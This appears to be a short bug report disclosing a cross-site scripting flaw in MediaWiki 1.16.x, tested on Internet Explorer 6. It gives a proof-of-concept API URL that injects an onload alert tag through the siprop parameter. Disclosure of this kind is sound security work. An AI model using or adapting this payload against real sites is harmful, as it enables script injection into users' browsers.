Author: masatokinugawa
Description:
I found an XSS vulnerability in MediaWiki.
I tested on Internet Explorer 6.
URL:
http://www.mediawiki.org/w/api%2Ephp?action=query&meta=siteinfo&format=json&siprop=%3Cbody onload=alert(1)%3E.html
Version: 1.16.x
Severity: normal
See Also:
https://bugzilla.wikimedia.org/show_bug.cgi?id=62289
https://bugzilla.wikimedia.org/show_bug.cgi?id=56575